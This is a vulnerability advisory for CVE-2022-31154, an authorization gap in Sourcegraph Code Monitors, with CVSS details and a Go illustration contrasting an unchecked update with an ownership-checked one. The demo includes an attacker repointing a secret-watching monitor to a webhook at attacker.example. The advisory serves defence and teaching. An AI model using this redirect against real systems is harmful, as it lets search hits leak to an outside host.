CVE-2022-31154 MEDIUM

CVE-2022-31154: Indirect Object Access in Sourcegraph Code Monitoring

Vendor Sourcegraph
Product sourcegraph
Weakness CWE-863 · Incorrect authorization
Published August 1, 2022
Last update April 23, 2025

CVSS base score

6.4/10
Attack vector Network
Attack complexity Low
Privileges required Low
User interaction None
Scope Changed
Confidentiality None
Integrity Low
Availability Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L

What the vulnerability does

01 Description

Sourcegraph is an open-source code search and navigation engine. In affected versions, any authenticated Sourcegraph user can edit the Code Monitors owned by any other Sourcegraph user, including both the trigger (the search query the monitor watches) and the action the monitor performs when it fires. The flaw is an authorization gap (CWE-863): the update is performed for whichever monitor ID the caller supplies, with no check that the caller owns that monitor. An attacker cannot read the contents of an existing monitor, only overwrite it, which is why the vector scores Confidentiality as None while Integrity and Availability are both Low: a victim's monitor can be silently repointed at a different query or action, and it no longer fires for its intended purpose. The issue is fixed in Sourcegraph 3.42. There is no workaround, and upgrading to 3.42 or later is strongly recommended.
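The pattern described above, shown as an added illustration rather than Sourcegraph's own code: a hypothetical in-memory monitor store with an update routine that only authenticates the caller (the flawed shape) beside one that also binds the update to the caller's ownership (the fixed shape). The `Monitor` type, the `Store`, the `UpdateVulnerable`/`UpdateSafe` functions and the sample monitors are all constructed for this example and are assumptions, not Sourcegraph's schema or API.

```go
package main

import (
	"errors"
	"fmt"
)

// Monitor is a hypothetical model of a code monitor: a search-query trigger
// and one action, owned by a single user. Not Sourcegraph's real schema.
type Monitor struct {
	ID      int
	OwnerID int
	Trigger string // the search query that fires the monitor
	Action  string // what runs on a hit, e.g. a mail recipient or webhook URL
}

// ErrNotFound is returned for missing monitors and, in the safe variant,
// for monitors the caller does not own, so the two cases are indistinguishable.
var ErrNotFound = errors.New("monitor not found")

// Store is an in-memory stand-in for the database table (constructed for the example).
type Store struct {
	monitors map[int]*Monitor
}

func NewStore() *Store { return &Store{monitors: map[int]*Monitor{}} }

func (s *Store) Add(m *Monitor) { s.monitors[m.ID] = m }

func (s *Store) Get(id int) (*Monitor, bool) {
	m, ok := s.monitors[id]
	return m, ok
}

// UpdateVulnerable mirrors the flawed shape: the caller is authenticated
// (actorID is known) but the monitor is fetched by ID alone and overwritten
// with no check that actorID owns it. Any logged-in user can therefore
// redirect another user's monitor to a different query and action.
func (s *Store) UpdateVulnerable(actorID, monitorID int, trigger, action string) error {
	_ = actorID // authentication happened; authorization never does
	m, ok := s.monitors[monitorID]
	if !ok {
		return ErrNotFound
	}
	m.Trigger = trigger
	m.Action = action
	return nil
}

// UpdateSafe binds the write to the acting user: the monitor is updated only
// if it exists AND belongs to actorID. Missing and not-owned both map to
// ErrNotFound so the endpoint cannot be used as an existence oracle.
// With a real database the equivalent is to put the ownership predicate in
// the statement itself (UPDATE ... WHERE id = $1 AND owner_id = $2) and treat
// zero affected rows as not found, so the check cannot be forgotten by a caller.
func (s *Store) UpdateSafe(actorID, monitorID int, trigger, action string) error {
	m, ok := s.monitors[monitorID]
	if !ok || m.OwnerID != actorID {
		return ErrNotFound
	}
	m.Trigger = trigger
	m.Action = action
	return nil
}

// seed builds a constructed sample: user 10 owns monitor 1.
func seed() *Store {
	s := NewStore()
	s.Add(&Monitor{
		ID:      1,
		OwnerID: 10,
		Trigger: `repo:^github\.com/acme/app$ password`,
		Action:  "mailto:alice@example.com",
	})
	return s
}

func main() {
	const attacker = 20 // a different authenticated user

	v := seed()
	err := v.UpdateVulnerable(attacker, 1, "type:diff secret", "https://attacker.example/hook")
	m, _ := v.Get(1)
	fmt.Printf("vulnerable: err=%v owner=%d action=%s\n", err, m.OwnerID, m.Action)

	f := seed()
	err = f.UpdateSafe(attacker, 1, "type:diff secret", "https://attacker.example/hook")
	m, _ = f.Get(1)
	fmt.Printf("safe:       err=%v owner=%d action=%s\n", err, m.OwnerID, m.Action)
}
```

The owner check belongs on every mutation path (update, delete, toggle), not only on reads: the advisory's point is precisely that the read path was protected while the write path was not.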

Key dates

02 Disclosure timeline

August 1, 2022 CVE published
April 23, 2025 Record updated